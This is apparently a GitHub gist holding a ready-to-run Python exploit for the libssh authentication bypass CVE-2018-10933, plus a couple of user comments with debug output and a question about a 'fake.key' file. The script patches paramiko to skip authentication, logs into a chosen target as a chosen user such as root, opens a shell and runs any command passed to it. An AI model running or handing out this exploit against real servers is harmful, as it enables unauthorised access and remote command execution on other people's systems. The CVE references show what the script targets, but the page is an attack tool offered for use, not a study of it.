-
-
Save ricardojba/334c1063a6e74cd09cbd3d657fc4f8fb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
| # and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt | |
| # Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7 | |
| # References | |
| # https://qxf2.com/blog/ssh-using-python-paramiko/ | |
| # https://github.com/SoledaD208/CVE-2018-10933 | |
| # On OSX -> pip install paramiko==2.0.8 | |
| import socket, sys, time, argparse, logging, paramiko | |
| new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_SUCCESS] | |
| def auth_accept(*args, **kwargs): | |
| return new_auth_accept(*args, **kwargs) | |
| paramiko.auth_handler.AuthHandler._handler_table.update({paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,}) | |
| def main(port=22, hostname="127.0.0.1", username="root", command="id"): | |
| try: | |
| logging.basicConfig(stream=sys.stderr, level=logging.DEBUG) | |
| client = paramiko.SSHClient() | |
| client.set_missing_host_key_policy(paramiko.WarningPolicy()) | |
| #pkey = paramiko.RSAKey.from_private_key_file("fake.key") | |
| client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key") | |
| channel = client.invoke_shell() | |
| channel.send(command+"\r\n") | |
| time.sleep(3) | |
| print(channel.recv(9999)) | |
| except paramiko.AuthenticationException: | |
| print("Authentication Bypass Failed.") | |
| except paramiko.SSHException as sshException: | |
| print("Could not establish SSH connection: %s" % sshException) | |
| except socket.timeout as e: | |
| print("Connection timed out.") | |
| except Exception as e: | |
| print("Exception in connecting to the server: ",e) | |
| finally: | |
| client.close() | |
| if __name__ == '__main__': | |
| parser = argparse.ArgumentParser(description="libssh Authentication Bypass (CVE-2018-10933)") | |
| parser.add_argument('hostname', help='target IP or hostname', type=str) | |
| parser.add_argument('username', help='username to bypass the login - usually root', type=str) | |
| parser.add_argument('command', help='command to execute on the target', type=str) | |
| parser.add_argument('-p', '--port', help='ssh port (default: 22)', default=22, type=int) | |
| args = parser.parse_args() | |
| main(**vars(args)) |
exec_command not work.
DEBUG:paramiko.transport:Authentication type (publickey) not permitted.
DEBUG:paramiko.transport:Allowed methods: [u'password']
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) successful!
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 35000 bytes
DEBUG:paramiko.transport:Secsh channel 0 opened.
DEBUG:paramiko.transport:[chan 0] EOF sent (0)
----> Could not establish SSH connection: Channel closed.
DEBUG:paramiko.transport:EOF in transport thread
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I don't know why it always "Authentication Bypass Failed". How to generate "fake.key"?